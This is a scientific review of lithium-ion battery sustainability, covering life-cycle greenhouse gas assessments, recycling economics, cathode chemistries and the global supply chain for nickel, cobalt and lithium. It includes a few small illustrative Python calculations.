[Figure 1 caption (panel a not recovered): b) Comparison of life-cycle GHG emissions of a mid-size EV and ICEV. [4] c) Electricity generation mix and emissions from electricity generation in selected regions in 2019. [4] Overall, EVs have lower GHG emissions than the ICEVs they displace, after considering mineral mining, battery assembling, vehicle manufacturing, and vehicle operation. However, EV emissions largely depend on the source of electricity generation; countries that rely heavily on fossil fuels have higher emissions. To reduce EV emissions, optimizing the electricity generation mix and developing renewable energy are of crucial importance. The figure is made based on the data from refs. [3] and [4].]
Sustainability Assessment
The capability of LIBs to power EVs and store electricity generated from renewable energy sources has led to the erroneous public perception that LIBs are "zero-emission" technologies. In reality, LIBs, just like other batteries, are essential tools to store and release electrical energy. The fact that LIB production is energy-and resource-intensive, and that current electricity generation still heavily relies on fossil fuels, can potentially cause environmental concerns. Moreover, disposal of spent LIBs without recycling could be detrimental to the environment. Life cycle assessment (LCA) is a systematic analysis of the potential environmental impacts of products, processes, or services throughout their entire life cycle. [7] It is generally accepted as a standard methodology to quantify the environmental influences of the production, usage, and recycling of LIBs.
Many LCA studies have been conducted to assess the environmental impacts of producing different LIB chemistries, including LiFePO4 (LFP), LiNixMnyCo1−x−yO2 (NMC), LiMn2O4 (LMO), and LiNixCoyAl1−x−yO2 (NCA), but their results are far from agreement. [8] The reported cradle-to-gate GHG emissions for battery production (including raw materials extraction, materials production, cell and component manufacturing, and battery assembling, as shown in Figure 2) range from 39 to 196 kg CO2-eq per kWh of battery capacity, with an average value of 110 kg CO2-eq per kWh of battery capacity. [8b-8j] The discrepancies in GHG emissions across prior studies can be attributed to a variety of reasons, such as different battery chemistries, regions of manufacturers, assumptions in LCA models, and modeling approaches to estimating energy demand in battery manufacturing. [8g,j] LFP, NMC, and LMO are the most studied battery chemistries in LCA, mainly due to their popularity in the current EV market and the availability of manufacturing data from the battery industry. Peters et al. critically analyzed a wide array of LCA studies of battery production and found that LMO has the lowest GHG emissions among the three battery chemistries, followed by NMC and LFP, based on the averages of results from published studies. [8g] Hao et al. examined GHG emissions from LIB production in China and reported a similar conclusion that the production of LMO automotive LIBs leads to the lowest GHG emissions and the production of LFP leads to the highest. [8f] GHG emissions of LIB production can also vary with the location of manufacturers due to differences in the quality of electricity used and the electricity generation source. [8f,j] For example, the production of LFP, NMC, and LMO batteries in China has nearly three times higher emissions than that in the US because electricity generation in China relies more on coal (Figure 1c). [8f] Besides battery chemistries and regions of manufacturers, the approach for modeling the battery manufacturing process to estimate energy demand also contributes to the wide discrepancies among LCA results. [8g,9] Prior studies used two modeling approaches to estimate the total energy demand in battery manufacturing: 1) the bottom-up approach, which uses data from theoretical simulations or lab-scale experiments of the critical processes in the manufacturing line, and 2) the top-down approach, which uses data from a real manufacturing plant. The latter approach usually results in a much higher estimated energy demand in battery manufacturing than the bottom-up approach. For example, using the top-down approach, Kim et al. assessed the cradle-to-gate GHG emissions from the mass-produced LIB used in the Ford Focus EV based on primary energy data from the battery cell and pack industries. [8c] In Kim et al.'s study, the estimated GHG emission from the cell and pack manufacturing process is 65 kg CO2-eq per kWh of battery capacity, which is over one order of magnitude higher than the range of 1.5-1.9 kg CO2-eq estimated by other studies using the bottom-up approach. [8c] Furthermore, real industrial manufacturing data are critical in LCA to obtain legitimate and practically informative results.
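As a back-of-envelope illustration of what this per-kWh range means at the pack level, the sketch below scales the cited cradle-to-gate factors to a hypothetical 60 kWh EV battery pack (the pack size is an assumption, not a figure from the cited studies).

```python
# Cradle-to-gate production emissions for one battery pack, using the
# per-kWh range reported in the LCA literature cited above.
FACTORS_KG_PER_KWH = {"low": 39, "average": 110, "high": 196}
pack_kwh = 60  # assumed pack capacity

for label, factor in FACTORS_KG_PER_KWH.items():
    tonnes = factor * pack_kwh / 1000
    print(f"{label}: {tonnes:.1f} t CO2-eq per {pack_kwh} kWh pack")
# 2.3 / 6.6 / 11.8 t CO2-eq: the ~5x spread mirrors the disagreement
# among published studies.
```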
Prior LCA studies agreed that battery electric vehicle (BEV) production generates more GHG emissions than ICEV production does. Hawkins et al. found that the cradle-to-gate GHG emissions associated with EV production are almost twice those associated with ICEV production, and battery production contributes 35% to 41% of the GHG emissions from EV production. [8b] This finding is supported by Kim et al., who reported a 39% increase in GHG emissions when switching from ICEV to EV in vehicle production. [8c] Hao et al. also indicated that there is around a 30% increase in GHG emissions for EV production compared to that of traditional vehicles. [8f] The higher GHG emissions associated with EV production in comparison to ICEV production are mainly because of the high GHG emissions from the production of the battery, generator, and motor, i.e., the electric powertrain system. Although EV production has higher environmental impacts, extending the system boundary to include the use phase of the EV (as shown in Figure 2) leads to a clear advantage of the EV compared to the ICEV, because EVs offer higher powertrain efficiency and zero tailpipe emissions. Hawkins et al. found that light-duty EVs powered by the present European electricity mix offer a 10% to 24% decrease in GHG emissions relative to ICEVs assuming a 150,000 km lifetime of EVs, and extending the lifetime of EVs to 200,000 km boosts the environmental benefits to a 27% to 29% decrease in GHG emissions. [8b] In another comparison between EVs and ICEVs, it was found that transport services with an EV result in a 35.6% (37,700 kg CO2-eq) decrease in GHG emissions compared to an ICEV, [8a] which is in general agreement with Hawkins et al.'s study. In addition, the electricity generation source plays a vital role in GHG emissions: EVs powered by coal electricity can lead to an increase in GHG emissions compared to ICEVs. [8h] Therefore, it is vital to power EVs with clean electricity sources to maximize their environmental benefits. Although global warming potential (GWP), as expressed in GHG emissions, is the most frequently assessed environmental impact category (EIC) in the majority of LCA studies, other critical EICs, such as abiotic depletion (ADP), acidification, eutrophication (EP), human toxicity (HTP), and ozone depletion (ODP), are equally, sometimes even more, important for assessing the environmental impacts of EV technology. Studies have raised concerns that production and use of EVs could potentially lead to increases in the HTP, EP, and ADP categories, mainly emanating from the EV supply chain. [8b,h,10] Recycling spent LIBs reduces the demand for virgin raw materials and the toxic waste entering the environment, which can potentially decrease the environmental impacts of the battery life cycle. [8j] However, the environmental benefit of LIB recycling depends on the recycling route and battery chemistry. In a comprehensive study conducted by Ciez and Whitacre, the authors examined the GHG emissions associated with recycling NMC, LFP, and NCA battery cells using three recycling routes: pyrometallurgical, hydrometallurgical, and direct cathode recycling. [8i] It was found that for NMC and NCA cells, there is a median reduction (roughly 0.2-1 kg CO2-eq per kg of battery) in GHG emissions from hydrometallurgical and direct cathode recycling.
However, pyrometallurgical recycling of NMC and NCA cells results in net increases in GHG emissions compared to no recycling, mainly because of the high energy consumption of the high-temperature processing and the loss of lithium in slag. For LFP cells, all three recycling routes result in net increases in GHG emissions due to the relatively small gain from recovering iron materials in LFP cells (compared with the Ni and Co materials in NMC and NCA), indicating that recycling LFP cells may not be sustainable from a GWP perspective. Among the three recycling routes, direct cathode recycling offers the highest environmental benefits because it avoids the energy- and chemical-intensive thermochemical unit operations and maintains the cathode's crystal structure and internal energy. However, there are concerns regarding the quality of cathode materials recovered from direct cathode recycling, and this route has not been proven at a commercial scale. Ciez and Whitacre's findings were supported by a recent study that assessed the environmental impacts of advanced hydrometallurgical recycling of LIBs based on primary data from a battery recycling company. [11] In this study, high environmental benefits (12-25% reduction of GHG emissions in comparison to no recycling) were obtained via advanced hydrometallurgical recycling of NMC and NCA cells, mainly because of the recovery of precious cobalt and nickel, but recycling of LFP cells was shown not to be environmentally sustainable. The substantial difference in the environmental impacts of recycling different battery chemistries highlights the necessity of developing battery chemistry-specific approaches. Yang et al. also showed that the preprocessing steps, such as collecting, sorting, and dismantling of spent LIBs, and transport between recycling facilities, can contribute substantially to the emissions. [8j] In addition to being recycled, spent battery packs recovered from end-of-life EVs could be reused in stationary applications as part of a "smart grid," and this scenario has been demonstrated to be environmentally beneficial. [12] However, its reliability and economic feasibility need to be further examined, as the reuse of spent LIBs in "smart grid" applications has not yet been developed commercially.
Besides the environmental considerations, economic analysis of LIB recycling is also of great concern because it determines which recycling technologies industry will select for profitability. However, detailed economic evaluations of the entire recycling process, and comprehensive comparisons across recycling routes and battery chemistries, remain scarce, probably because few recycling processes operate at commercial scale. The profitability of battery recycling depends on two main factors: the costs of collecting and processing spent batteries, and the revenues from selling recovered materials. Yang et al. reviewed the economic benefits of recycling different battery materials and showed that LCO recycling offers the best economics, followed by NMC, whereas recycling Fe- or Mn-based cathodes that are free of valuable metals such as Ni and Co yields a negative net economic value. [8j]
Lin et al. found that recycling LFP cathode material is marginally profitable, about $196 per ton of spent LFP batteries, mainly because of the low price of the recycled chemicals and the high consumption of leaching reagent (acetic acid). [13] On the other hand, recycling LCO cathode materials can be highly profitable owing to the high prices of Co and Li. According to Lin et al.'s economic analysis, recycling 1 ton of spent LCO powder can yield a total profit of $31 032 using the conventional sulfation roasting technique. [14] Regarding the popular NMC battery, Xiong et al. analyzed the entire remanufacturing cycle, which includes chemical recycling, cathode remanufacturing, and cell remanufacturing. [15] They found that the potential cost saving from hydrometallurgical remanufacturing of NMC battery cells is about $1870 per ton compared with producing batteries from virgin materials. The choice of recycling route also plays a major role in the economics of spent battery recycling, and direct recycling emerges as the most economical route compared with the energy- and chemical-intensive pyrometallurgical and hydrometallurgical routes. [8j] However, the quality of the recycled cathode materials needs to be assessed against the standards for reuse. Overall, the currently limited studies indicate that the economic feasibility of battery recycling depends strongly on the battery chemistry and recycling route. In addition, the cost of recycling varies significantly across locations, while the revenue is similar owing to global trading. [8j] Therefore, the location of recycling should be taken into consideration in practice.
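The chemistry dependence described above can be illustrated with a minimal per-ton margin calculation. The metal contents, prices, recovery rate, and processing cost in the sketch below are rough placeholder assumptions, not the figures behind refs. [8j,13-15]; the point is only that the revenue side collapses once Co and Ni are absent.

```python
# Per-ton recycling margin for three cathode chemistries. Metal contents
# (kg per ton of cathode material), prices (USD per kg), recovery rate,
# and processing cost are rough placeholder assumptions, not the data
# behind refs. [8j,13-15].

CONTENT_KG_PER_TON = {
    "LCO":    {"Li": 70, "Co": 600},
    "NMC111": {"Li": 72, "Co": 200, "Ni": 200},
    "LFP":    {"Li": 44, "Fe": 350},
}
PRICE_USD_PER_KG = {"Li": 60.0, "Co": 50.0, "Ni": 20.0, "Fe": 0.1}

RECOVERY = 0.90                  # assumed fraction of metal recovered
PROCESSING_COST = 4000.0         # assumed USD per ton of feed

for chem, content in CONTENT_KG_PER_TON.items():
    revenue = sum(kg * RECOVERY * PRICE_USD_PER_KG[m]
                  for m, kg in content.items())
    margin = revenue - PROCESSING_COST
    print(f"{chem:7s} net value: ${margin:>10,.0f} per ton")
```

Under these placeholder numbers the Co-bearing chemistries clear the processing cost comfortably while LFP does not, mirroring the profitability ordering reported in the cited studies.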
Cathode Materials
The LCA studies showed that cathode materials are a substantial contributor to GHG emissions and energy consumption in manufacturing LIBs. [8h,i,16] LIBs were first commercialized by Sony Corporation in 1991, adopting LiCoO2 (LCO) as the cathode and graphite as the anode. [17] As graphite remains the primary anode in most commercial LIBs, the bottleneck for energy density is still the cathode. From 1991 to the 2010s, the price of LIBs dropped by nearly 97%. [6] The cathode is the largest cost contributor among all battery components according to the cost model developed by Ziegler et al. [6] Efforts to boost cell charge density and to lower cathode prices accounted for 38% and 14% of the LIB cost reduction, respectively. [6] Therefore, manipulating cathode design at the materials level is essential to the sustainability of the LIB industry. Several factors need to be considered when evaluating a cathode material, including but not limited to electrochemical performance (e.g., energy density, cycle life), raw material abundance, cost, and carbon emissions during production. These factors depend largely on the transition metals in the cathode. Here, we categorize the state-of-the-art cathodes by their chemical compositions, especially their transition metals (Table 1). LCO is widely applied in consumer electronics owing to its high energy density, good conductivity, and high discharge voltage. However, LCO is unsuitable for large-scale applications because of the toxicity, scarcity, and high cost of Co. Shortly after the successful commercialization of LCO in the 1990s, the Ni-based cathode LiNiO2 (LNO) received much attention. [18] LNO is isostructural to LCO and has a similar theoretical capacity (275 mAh g−1) but avoids the problematic Co. However, severe Li/Ni cation mixing and phase transformation issues give LNO low stability. [19] This inherent instability raises durability and safety concerns, which hinder its commercialization even today. The battery community has made great efforts to enhance the performance of LNO and other Ni-rich variants. [20] Introducing other metal cations (e.g., Mn, Al, Co) to partially substitute Ni is one of the most successful ways to optimize LNO; this is how NMC and NCA came into play. [21] NMC and NCA are families of cathodes with various ratios of Ni to other metal cations in the chemical formula. Lower Ni content enhances cycling and thermal stability but limits energy density. NMC and NCA have propelled the automotive battery industry over the past decade. Moving toward higher Ni content has become the trend in Ni-based layered cathode development as the demand for high energy density increases. However, this is not simply a return to LNO: various approaches, such as doping and coating, are applied to balance energy density and stability. [22] In the meantime, decreasing or eliminating Co in NMC and NCA has become more pressing. Co contributes a significant portion of the total cost and carbon emissions of cathode production. [8h] Moreover, child labor and human rights abuses in Co mining have drawn widespread criticism. Therefore, Ni-rich, Co-free cathodes have gained extensive attention recently, and a variety of metal cations have been explored to replace Co and improve the stability of Ni-rich cathodes. [23] Ni-based cathodes will persist, thanks to their high energy density, until more appealing cathodes appear.
However, Ni will eventually become limited and expensive. The IEA forecasts that the demand for Ni and Co in clean energy applications will increase 40-fold from 2020 to 2050. [16] The LIB supply may evolve dynamically as mineral extraction technologies develop and more mineral resources are discovered. However, such a rapid increase in demand for Ni and Co can hardly be absorbed without a partial shift away from Ni-rich chemistry. Additionally, the demand increase will further induce price volatility in raw materials.
The exploration of Ni-free and Co-free cathodes never stops. LFP is one of the most successfully commercialized cathodes, possessing long cycle life, high stability, and safety. [24] The only transition metal in LFP is Fe, which is abundant, inexpensive, and environmentally friendly. However, the energy density of LFP is relatively low compared with Ni-based cathodes, and its conductivity is intrinsically low. [25] Therefore, LFP requires further processing, such as coating and particle size engineering. [26] Mn is another inexpensive, abundant, and low-toxicity metal. LiMnPO4 (LMP) is isostructural to LFP with a similar theoretical capacity but a higher operating potential, thereby giving a higher energy density than LFP. [24a,27] The polyanion framework leads to high oxygen stability and safety, but slow Li kinetics and low electronic conductivity result in inferior rate performance. LMO is another promising Mn-based alternative to Ni- and Co-containing cathodes. [28] LMO has a spinel structure and a 3D Li-ion transport framework, in contrast to the 2D layered structure of Ni- and Co-based cathodes. LMO therefore possesses excellent rate capability and high power density and is often applied in power tools. However, LMO suffers from a short cycle life, especially at elevated temperatures (>50 °C), because of structural degradation and Mn dissolution, and its energy density is relatively low. [29] A successful demonstration of LMO is its application in EVs by blending LMO with NMC to exploit the advantages of both materials: LMO improves acceleration with its high power density, and NMC supports long-distance driving with its high energy density. [30] It was also reported that NIO Inc. announced that it would adopt hybrid NMC-LFP battery packs in its EVs. [31] This approach can serve as a temporary solution to reduce reliance on Ni and Co during the transition to Ni- and Co-free cathodes. Meanwhile, it is crucial to develop high-energy cathodes that do not rely substantially on Ni or Co. LiNi0.5Mn1.5O4 (LNMO) is a low-Ni, Mn-based spinel cathode material with a high working potential (4.7-4.9 V vs Li/Li+) and a high energy density (around 650 Wh kg−1) at the materials level. [32] The high power density of LNMO also makes it a good candidate for power tools. However, the decomposition of conventional liquid electrolytes at high voltage, inferior electronic conductivity, and Mn dissolution raise concerns about cycling stability and safety, which impede the commercialization of LNMO. [33] There was a clear shift toward Ni-based cathodes and higher Ni content for EV batteries as higher energy density came into large demand, but Ni- and Co-free cathodes have regained attention in recent years. The share of NMC and NCA materials in electric light-duty vehicles (LDVs) grew steadily from 2014 to 2019, and in 2019 NMC and NCA accounted for more than 80% of total cathode materials in new electric LDVs worldwide. [34] LFP is adopted primarily in China, and its share of all cathodes decreased from 60% in 2014 to around 10% in 2019. [34] LMO has also experienced a declining market share year by year, possibly because of the growing need for energy density. However, the worldwide increase in demand for Ni and Co drove up the cost of these raw materials as battery chemistry leaned toward Ni-rich NMC and NCA. Furthermore, the COVID-19 pandemic has caused extensive damage to the global economy, driving up the cost of EVs.
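The materials-level energy densities quoted in this section follow from a simple relation: gravimetric energy density (Wh kg−1) is the product of specific capacity (mAh g−1) and average voltage (V). The sketch below evaluates this for several of the cathodes discussed; the capacity and voltage values are representative assumptions for illustration, not authoritative specifications.

```python
# Materials-level gravimetric energy density: specific capacity (mAh/g)
# multiplied by average voltage (V vs Li/Li+) gives Wh/kg directly.
# Capacities and voltages are representative assumed values.
CATHODES = {
    #          (practical capacity mAh/g, average voltage V)
    "LCO":    (165, 3.9),
    "NMC811": (200, 3.8),
    "LFP":    (165, 3.4),
    "LMO":    (110, 4.0),
    "LNMO":   (140, 4.7),   # high-voltage spinel discussed above
}

for name, (capacity_mah_g, voltage_v) in CATHODES.items():
    energy_wh_kg = capacity_mah_g * voltage_v   # mAh/g * V = Wh/kg
    print(f"{name:7s} ~{energy_wh_kg:4.0f} Wh/kg (materials level)")
```

With these inputs the high-voltage LNMO spinel lands near the ~650 Wh kg−1 cited above, while LFP's lower voltage and capacity explain its energy density gap relative to Ni-rich layered oxides.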
The supply and price of Ni and Co can also be greatly affected by geopolitical instability and wars. [35] LIBs with modest energy density can satisfy the daily commuting needs of most EV consumers, and high energy density becomes less significant as fast charging develops and more charging infrastructure is constructed. Therefore, LFP is undergoing a resurgence owing to its safety, low cost, and fast charging capability. Its market share across all EV cathodes grew from about 10% in 2019 to 19% in 2020 and 24% in 2021. [31] Introducing excess Li into the cathode is another strategy to further enhance battery energy density. Li-rich layered oxides (LLOs) are a series of high-energy Mn-based cathodes. In the 1990s, Thackeray et al. demonstrated Li2MnO3-stabilized layered materials and reported xLi2MnO3·(1−x)LiMnO2. [36] Shortly thereafter, more metal ions were incorporated and the LLO family was expanded to xLi2MnO3·(1−x)LiMO2 (M = Ni, Mn, Co). [37] We note that the nature and history of these materials, whether solid solution or composite, are still under debate. LLOs have a high discharge capacity and benefit from the use of low-cost, nontoxic Mn. However, voltage decay, low rate capability, and low initial Coulombic efficiency complicate their commercialization. [38] The high-voltage operating conditions of LLOs induce more oxygen loss and lower the cycling stability, and electrolytes compatible with such high voltages are rare, further hampering practical applications. Many researchers are working to understand the degradation mechanisms of LLOs and enhance their electrochemical performance, but LLOs remain primarily at the research stage. [39] Disordered rocksalt (DRX) cathodes, another class of Li-excess materials, have recently attracted extensive research attention. DRX cathodes admit various choices of 3d and 4d metals, in contrast to conventional layered oxides that rely on particular scarce metals, [40] so the design of their chemical compositions is more flexible: earth-abundant and inexpensive metals, such as Mn, Fe, and Cr, can be utilized more efficiently. DRX cathodes are therefore a promising alternative to existing commercial cathodes given their wide range of raw materials, flexible compositions, and high energy density. However, DRX development is still limited to lab-scale research, and the synthetic routes and scale-up production are immature at the current stage. Li et al. comprehensively reviewed the progress and potential hurdles for the commercialization of DRX cathodes. [41] To achieve superior capacity, DRX cathode particles are normally pulverized into nanoparticles to shorten Li diffusion distances. The nanosized particles have a large surface area and suffer more parasitic surface reactions, resulting in faster performance decay. The active material to carbon-and-binder ratio is kept low for DRX cathodes to achieve better conductivity and Li kinetics.
To the best of our knowledge, typical active material mass loadings for DRX cathodes are around 70%, with the highest reported being 80%, [41] significantly lower than the loadings of commercial cathodes. Moreover, the Li diffusivity of these Li-excess DRX cathodes remains lower than that of conventional layered oxides by orders of magnitude, which raises Li kinetics problems. [41] Such low active material loading and small particle size make it challenging to enhance the volumetric energy density in practical use. For these Li-excess cathodes, oxygen redox reactions readily take place owing to the population of high-energy Li-O-Li states, which can induce oxygen loss at the particle surface and irreversible transition metal migration. [42] These undesired structural transformations cause capacity and voltage fading and, eventually, performance degradation. All of these hurdles currently impede the commercialization of Li-excess cathodes. In addition, the availability and price of Li should be considered when developing Li-excess materials, as Li is the most essential metal in all types of LIBs. Conversion-type cathodes, by contrast, typically rely on significantly cheaper and more Earth-abundant elements, such as chalcogens. For example, Li-S batteries offer relatively high energy density and low cost, but large volume expansion and the shuttle effect of soluble species lead to performance degradation, hindering their application in EVs. [43] Overall, no single electrode material suits all application scenarios. Distinct applications call for the particular advantages of specific cathodes, such as the high energy density of Ni-rich NMC or the stability and low cost of LFP. Each of the cathodes discussed is expected to advance, and they will coexist across different applications, but the general trend will be toward a more sustainable approach.
Shifting from Ni- and Co-based cathodes to sustainable materials will become the general trend as these minerals become more limited, similar to the transition from fossil fuels to green energy resources. However, Ni- and Co-based cathodes still possess the appealing advantage of high energy density, which translates in practice to long driving range in EVs. Comprehensive reviews of LIB electrode materials suggest that various chemistries and configurations will persist for specialized applications. [30,44] There are several approaches to making Ni- and Co-free cathodes more competitive, not only at the cathode level but also at the anode and battery pack levels: 1) advancing anode materials, such as Li metal and Si anodes, to greatly improve the cell-level energy density; and 2) optimizing the form factor of the individual cell and battery pack to further enhance battery performance. Furthermore, the development of associated supporting facilities can reduce range anxiety and the demand for high-energy electrodes: 1) developing fast charging and more efficient charging methods (e.g., wireless charging during driving); 2) constructing more distributed charging stations; and 3) combining battery charging with battery pack swapping for different types of EVs.
Supply Chain and Manufacturing
More practical factors beyond materials design need to be considered in industrial manufacturing, such as the supply chain and battery pack manufacturing. The LIB supply chain can be traced back to the extraction and processing of raw minerals. A volatile supply chain or inefficient manufacturing may offset the performance benefits delivered by electrode materials. The mining and processing of LIB raw materials are more scattered across the world than the corresponding procedures for fossil fuels (Figure 3). The uneven distribution of essential raw minerals may give rise to geopolitical challenges and affect the global LIB industry. For example, Ni is a predominant metal in commercial cathodes for LIBs, and Russia is one of the major countries that extract and refine Ni (Figure 3a,b). Owing to the Russia-Ukraine war, the price of Ni almost doubled within one week from late February to early March 2022. [35a] The IEA reported that the total battery cost could increase by 6% if the price of Ni or Li were doubled. [4] Contemporary Amperex Technology Co. Ltd. (CATL), the largest LIB manufacturer in the world, announced price increases for some battery products because of rising raw material costs. [46] Accordingly, some EV companies, such as Tesla, Rivian, and BYD, have raised the prices of their EVs in response to increasing supply chain costs. [47] Therefore, evaluating global supply chain and manufacturing capability is vital to gaining a comprehensive understanding and a reasonable forecast of LIB development.

Figure 3. a) Share of fossil fuel and mineral extraction. [4,48,75] b) Share of fossil fuels and mineral processing in 2018, 2019, and 2020. [4,48,62] c) LIB manufacturing capacity by country in 2016, 2019, and 2020. [57,63,65] The area of the color-coded circles is proportional to the share (percentage) or capacity (GWh). NG: natural gas. DRC: the Democratic Republic of the Congo. The shaded rings around specific circles are "error rings" calculated from data collected from different references. The figure displays only the top three countries for fossil fuel extraction and processing and the major contributing countries/regions in LIB cradle-to-gate processes; quantitative results for more countries and regions are given in Tables S1-S3 in the Supporting Information. The distribution of LIB raw mineral materials is sporadic across the world, but raw material processing and LIB manufacturing are concentrated mainly in Asia.
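The IEA sensitivity quoted above has a simple interpretation: if doubling the price of one metal raises total battery cost by about 6%, that metal accounts for roughly 6% of cell cost, and under a linear cost model the increase scales with the price multiplier. The sketch below works through this implied arithmetic; the 6% share is the only input taken from the text, and the linear model is our simplifying assumption.

```python
# Implied arithmetic behind the cited IEA sensitivity: doubling one
# metal's price raising total battery cost by ~6% implies that metal
# is ~6% of cell cost. The linear scaling below is our simplification.

def battery_cost_increase(metal_cost_share: float,
                          price_multiplier: float) -> float:
    """Fractional increase in total battery cost when one metal's
    price is scaled by `price_multiplier`."""
    return metal_cost_share * (price_multiplier - 1.0)

METAL_COST_SHARE = 0.06   # assumed share reproducing the IEA figure

for multiplier in (1.5, 2.0, 3.0):
    delta = battery_cost_increase(METAL_COST_SHARE, multiplier)
    print(f"metal price x{multiplier}: battery cost +{delta:.1%}")
```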
The fossil fuel supply chain is well established and has remained relatively stable, whereas the LIB supply chain is under development and evolving rapidly. The primary oil producers are the United States (US), Russia, and Saudi Arabia, and the top three oil refining countries are the US, China, and Russia (Figure 3a,b). [4] For natural gas production and distribution, the major producing countries are the US, Russia, and Iran, and the top three exporting countries are Qatar, Australia, and the US (Figure 3a,b). [4] In contrast, the global competition over the LIB supply chain has just begun. The essential minerals for producing LIBs are distributed across the globe. In 2019 and 2020, the three major Ni mining countries were Indonesia, the Philippines, and Russia, with global shares of 29.8-33.0%, 12.0-15.7%, and 10.1-11.3%, respectively (Figure 3a and Table S1, Supporting Information). [4,48] For Co mining, the Democratic Republic of the Congo (DRC) dominates with 69.0-70.4% of the global share, while Australia and Russia contribute 4.0-4.2% and 4.0-4.7%, respectively (Figure 3a and Table S1, Supporting Information). [4,48a] The top three contributors to global Li mining are Australia (48.7-52.0%), Chile (21.9-22.0%), and China (13.0-17.0%). [4,48a] Given the dispersed distribution of raw materials, the LIB supply chain requires worldwide collaboration. Moreover, the leading countries for mining certain materials may change as new deposits are discovered and mining technology improves. For example, a recent assessment of worldwide metal reserves indicated that the top-reserve countries for Li2CO3, Ni, and Co are Chile, Indonesia, and the DRC, with 52 670, 28 750, and 2970 thousand metric tons, respectively. [49] However, unexplored regions with considerable potential for mineral resources could be game-changers.
Assessing the future demand-supply balance of LIB raw materials is challenging because of uncertain factors including, but not limited to, the pace of automotive electrification and spent EV battery recycling, reliance on Ni- and Co-based cathodes, supply from new mining resources (e.g., the seabed), production efficiency gains from technology improvement, and corresponding policies. Whether the Co supply will meet demand in the coming decades remains controversial in the literature. [50] Tisserant and Pauliuk estimated that the Co reserves in the ground will be sufficient to supply demand until at least 2050. [51] Sverdrup et al. created a model to assess the long-term Co supply and predicted that it will remain sufficient until 2130, reaching a peak in 2040-2050. [52] The price of Co could rise sharply after 2050; from 2080, the Co recycling rate will increase and Co supply from recycling will exceed primary extraction in response to the higher price. One potential concern with these earlier studies is their underestimation of automotive electrification ambitions and the corresponding Co demand. Other studies are more conservative and less optimistic. Zeng et al. suggested that although battery technology improvement and recycling can deliver long-term Co supply sustainability, an unavoidable Co shortage will occur during 2028-2033. [53] Valero et al. likewise predicted that Co demand will exceed supply as early as 2030. [54] Some studies also project a possible Ni shortage in the coming years: Valero et al. expect a bottleneck period for Ni, when demand exceeds supply, in 2027-2029, [54] in agreement with another study forecasting a Ni deficit by 2028. [55] It is commonly believed that Li supply will not be a constraint in this century, but recycling is vital to avoiding an early supply deficit. [56] Regional supply and geopolitical factors add further uncertainty to estimates of global mineral demand-supply risk. The uncertainties in Co supply arise mostly from the heavy reliance on production from the DRC and its unstable political environment (Figure 3a). [57] If the scope is narrowed to regional supply, however, 96% of the Co imported by the European Union (EU) came from Russia, [58] so global estimates might not apply to regional forecasts. In addition, competition for raw materials between regions adds more uncertainty to the global LIB supply chain. Sun et al. evaluated the competition intensities for 15 LIB-related commodities (lithium minerals, cobalt ore, nickel ore, etc.) across 238 countries and regions in 2019. [59] For example, the competition between Japan and South Korea for lithium hydroxide and lithium carbonate is the most intense of all those analyzed, as both countries rely heavily on imported lithium raw materials for battery manufacturing. [59] The competition between China and Finland for cobalt ore is also intense because they are the top two cobalt refining countries while their domestic cobalt reserves are insufficient (Figure 3a,b). [59] Further details can be found in the original reference. [59]
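A toy model helps show why the shortage forecasts above diverge so widely: the projected shortage year is extremely sensitive to the assumed demand growth rate. The sketch below accumulates exponentially growing annual demand against a fixed reserve figure; all inputs are placeholder assumptions, not the data behind the studies cited above.

```python
# Toy demand-vs-reserves projection for a single metal. All inputs are
# placeholder assumptions, not figures from the studies cited above;
# the point is the sensitivity of the "shortage year" to growth rate.

RESERVES_KT = 7_600          # assumed recoverable reserves, kt
DEMAND_2020_KT = 140         # assumed annual demand in 2020, kt

for growth in (0.08, 0.12, 0.16):
    cumulative, demand = 0.0, DEMAND_2020_KT
    for year in range(2020, 2081):
        cumulative += demand
        if cumulative > RESERVES_KT:
            print(f"growth {growth:.0%}: cumulative demand exceeds "
                  f"assumed reserves in {year}")
            break
        demand *= 1 + growth
    else:
        print(f"growth {growth:.0%}: reserves outlast demand to 2080")
```

Shifting the assumed growth rate by a few percentage points moves the crossover year by roughly a decade, which is one reason published Co and Ni forecasts disagree.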
Besides mineral reserves, mineral processing capability also plays a crucial role in the LIB supply chain, and reserves may not directly reflect the demand of the LIB industry. The reason is that LIB production normally needs high-purity precursors, which require further processing after mining as well as specific mineral sources. [57] For example, Class 1 Ni sulfate (Ni purity of 99.8% or greater) that is eligible for LIBs is mostly produced from Ni sulfide ores, which account for only around 40% of available Ni reserves. [57,60] Such strict requirements on raw materials also bring challenges to recycling. The fact that many essential metals for LIBs are produced mainly as byproducts of other metal mining further complicates the LIB supply chain; [57] for instance, over 80% of Co is produced as a byproduct of Ni and Cu. [61] The worldwide distribution of mineral processing is relatively concentrated. China has the largest processing volumes for multiple essential metals, with global shares for Li, Ni, Co, and Cu processing of 55.0-58.0%, 29.9-35.0%, 63.6-65.0%, and 39.8-40.0%, respectively (Figure 3b and Table S2, Supporting Information). [4,48a,62] Other major processing countries are distributed across the rest of Asia, Europe, and South America. Separators are another critical LIB component, serving as a physical barrier that prevents cell short-circuiting and as an electrolyte reservoir for Li transport. The major LIB separator manufacturers are located in Asia: China, Korea, Japan, and the US accounted for 43%, 28%, 21%, and 6% of global separator manufacturing, respectively. [63] The separator market of the Asia-Pacific region is forecast to grow rapidly and remain dominant over the next 5 years. [64] LIB manufacturing is the next key step. In recent years, China, the US, Europe, South Korea, and Japan accounted for 62.3-76.9%, 7.9-13.1%, 1.4-7.0%, 4.0-9.8%, and 3.2-11.8% of global LIB production, respectively (Figure 3c and Table S3, Supporting Information). [57,63,65] These statistics show that LIB manufacturing is dominated by Asia, especially China. More facilities will be established in Europe, North America, Australia, and Asia, considering those under construction or planned. [66] China, Japan, and South Korea ranked first, second, and third in the 2020 LIB supply chain ranking, which is evaluated on the basis of raw materials, manufacturing, battery demand, and other criteria. [67] Europe and North America are progressing, and their gap with Asia is narrowing: in 2021, the US and Germany moved up to second and third place, respectively, positions they are predicted to hold in 2026. [68] Additionally, Asian countries, including China, South Korea, and Japan, have vertically integrated their supply chains from raw material processing to battery manufacturing. [57] In the 1990s, Japan resolved to develop its LIB industry; the Japanese government supported the research and development (R&D) of private firms and helped them establish low-cost manufacturing plants. [57] China and South Korea have replicated Japan's success by developing partnerships between government and the LIB industry and by providing subsidies since the late 2000s. [57] The mature LIB supply chain and accumulated technology and production experience gave these Asian countries an advantage in the EV era. The US and Europe did not focus on domestic LIB manufacturing until the late 2010s, so their supply chains are less robust and their manufacturers relatively inexperienced. [57] Overall, Asia currently has the edge in raw material processing and LIB manufacturing, but Europe and North America are accelerating the construction of their supply chains.
